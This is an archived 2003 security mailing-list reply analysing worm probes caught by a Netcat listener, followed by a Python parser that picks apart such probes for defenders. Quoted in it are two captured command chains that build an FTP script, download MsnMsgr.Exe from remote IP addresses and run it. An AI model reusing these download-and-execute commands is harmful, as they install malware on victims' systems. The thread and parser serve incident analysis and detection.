Security Incidents mailing list archives
Re: New Worm or Worm Variant?
From: Harlan Carvey <keydet89 () yahoo com>
Date: Thu, 11 Dec 2003 05:41:00 -0800 (PST)
> I've been seeing a jump in 20168/tcp scans over the past week or so. This port is commonly associated with the Lovegate worm.
Not always a good idea to go w/ default ports. It may be a way to start, but most malware is configurable, and new stuff is coming out all the time.
> I recently set up a port listener using Netcat to capture any output from probes against a couple of my systems. Shown below are the results:
Good man! It's about time someone decided to do that without having to be asked...
> echo open 211.26.130.118 >> wxtu.dll & echo USER noxe >> wxtu.dll & echo noxe >> wxtu.dll & echo binary >> wxtu.dll & echo get MsnMsgr.Exe >> wxtu.dll & echo bye >> wxtu.dll & ftp -n -s:wxtu.dll & del wxtu.dll & start MsnMsgr.Exe
>
> echo open 211.26.132.172 >> wxtu.dll & echo USER noxe >> wxtu.dll & echo noxe >> wxtu.dll & echo binary >> wxtu.dll & echo get MsnMsgr.Exe >> wxtu.dll & echo bye >> wxtu.dll & ftp -n -s:wxtu.dll & del wxtu.dll & start MsnMsgr.Exe
>
> At first glance it looks like some sort of non-interactive FTP session to download an exploit (MsnMsgr.Exe),
At first glance? That's exactly what it is!
> but Googling for wxtu.dll came up empty (so this could be anything from a real .dll to a renamed executable in my mind).
That's b/c wxtu.dll is nothing but a text file in this case. The 'echo' statements and redirection are used to create the DLL...it's not surprising (shouldn't be) that you're not seeing references to it on Google. This is similar to the IRC bots a bit ago...each new variation of the bot had different scripts and different names, but they all used mIRC32.exe and hidewndw.exe at their core. Each variation simply changed the names of the executables. I took a look at the RussianTopz bot, which used statistics.exe and Teamscan32.exe, respectively.
> 1) Has anyone run across anything like this before? This looks like something automated to me.
That's b/c it *is* automated.
> 2) Any theories on wxtu.dll? Since I can't get a hold of the malware to analyze it, I'm really guessing at this point.
The DLL is just an FTP script file. It's not necessarily "malware" in and of itself. To be honest, the commands you captured (thanks, again, btw) are very clear on that.
> MsnMsgr.Exe seems to be the exploit itself, and it appears to be using something like FTPCOM to do a non-interactive FTP session, but wxtu.dll could be anything from a real .dll file to a renamed executable. Ideas?
Yeah, you're WAY off base. While MsnMsgr.exe *is* the malware, the DLL you keep looking at is *NOT* a real DLL and is *NOT* executable. It's very, very clear from what you've sent that the DLL is nothing more than a script file, filled with FTP commands. Go to the online help on your system and look up FTP. BTW...what the *hell* is FTPCOM??? ;-)

HTH,
Harlan
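The echo / ftp -s: / start pattern Harlan describes above, worked as a defender's parser (an added example, not code from this thread): it replays the `echo ... >> file` writes in a captured or logged command line, reads the resulting script the way ftp.exe does, and reports the server, credentials, fetched files and whether a fetched file is then launched. The sample input is the first captured sequence quoted above; the record field names are this example's own.

```python
import re

# Sample input: the first captured probe sequence quoted in the thread above.
CAPTURED = (
    "echo open 211.26.130.118 >> wxtu.dll & echo USER noxe >> wxtu.dll & "
    "echo noxe >> wxtu.dll & echo binary >> wxtu.dll & "
    "echo get MsnMsgr.Exe >> wxtu.dll & echo bye >> wxtu.dll & "
    "ftp -n -s:wxtu.dll & del wxtu.dll & start MsnMsgr.Exe"
)

ECHO_RE = re.compile(r"\becho\s+(.*?)\s*>>\s*(\S+)", re.I)  # echo line >> file
FTP_RE = re.compile(r"\bftp\b[^&]*?-s:(\S+)", re.I)        # ftp -n -s:file
START_RE = re.compile(r"\bstart\s+(\S+)", re.I)
DEL_RE = re.compile(r"\bdel\s+(\S+)", re.I)

def parse_ftp_script(lines):
    """Read an ftp.exe -s: script: 'open host', 'USER name', password line, 'get file'."""
    info = {"server": None, "user": None, "password": None, "fetched": []}
    expect_password = False
    for parts in (l.split() for l in lines if l.strip()):
        if expect_password:  # ftp.exe takes the line after USER as the password
            info["password"], expect_password = parts[0], False
            continue
        cmd = parts[0].lower()
        if cmd == "open" and len(parts) > 1:
            info["server"] = parts[1]
        elif cmd == "user" and len(parts) > 1:
            info["user"], expect_password = parts[1], True
        elif cmd in ("get", "mget") and len(parts) > 1:
            info["fetched"].append(parts[1])
    return info

def find_ftp_downloaders(cmdline):
    """Replay the echo >> writes in an &-chained command line; one record per 'ftp -s:' run."""
    scripts, findings = {}, []
    for frag in re.split(r"\s*&+\s*", cmdline):
        if m := ECHO_RE.search(frag):
            scripts.setdefault(m.group(2).lower(), []).append(m.group(1))
        if m := FTP_RE.search(frag):
            rec = parse_ftp_script(scripts.get(m.group(1).lower(), []))
            findings.append({**rec, "script": m.group(1).lower(), "executed": []})
        if (m := START_RE.search(frag)) and findings:
            findings[-1]["executed"].append(m.group(1))
        if m := DEL_RE.search(frag):
            scripts.pop(m.group(1).lower(), None)  # script deleted after use
    for rec in findings:  # the tell-tale: what was fetched is what gets launched
        rec["launches_fetched"] = any(e.lower() in {f.lower() for f in rec["fetched"]} for e in rec["executed"])
    return findings
```

Feeding it both captured sequences back to back (as the listener recorded them, with no separator between `start MsnMsgr.Exe` and the next `echo`) yields two records, since the `del` between them starts a fresh script.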